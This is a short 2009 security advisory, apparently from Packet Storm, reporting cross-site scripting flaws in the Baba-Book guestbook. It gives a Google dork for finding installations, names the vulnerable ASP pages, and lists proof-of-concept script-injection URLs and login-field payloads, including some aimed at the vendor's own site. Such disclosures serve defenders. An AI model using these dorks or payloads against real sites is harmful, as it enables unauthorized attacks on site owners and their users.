Baba-Book suffers from multiple cross site scripting vulnerabilities.
d02a475adca3b16863938aeaca3e4fde6029d8cf0c8d195475939ec01e91209c ===========================================================================================
Title : Multiple Cross-site Scripting (XSS) Vulnerabilities
Software : Baba-Book
Vendor : www.bp371.com
Date : 26 April 2009 (Indonesia)
Author : Vrs-hCk
Contact : d00r@telkom.net
Blog : http://c0li.blogspot.com/
===========================================================================================
[-] Google Dork
"Powered by Baba-Book"
[-] Vulnerable
post.asp
gshow.asp
admin_login.asp
[-] Exploit
[+] GET Method
http://[site]/[path]/post.asp?id=1'[XSS]
http://[site]/[path]/gshow.asp?id=1'[XSS]
[+] POST Method
http://[site]/[path]/admin_login.asp
[-] Online Demo
[+] GET Method
http://www.bp371.com/ly/gshow.asp?id=1'<script>alert(123)</script>
[+] POST Method
http://www.bp371.com/ly/admin_login.asp
username & password : '<script>alert(123)</script>
===========================================================================================
Greetz :
Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
c0li.m0de.0n and Behave oR BeGone !!!
===========================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed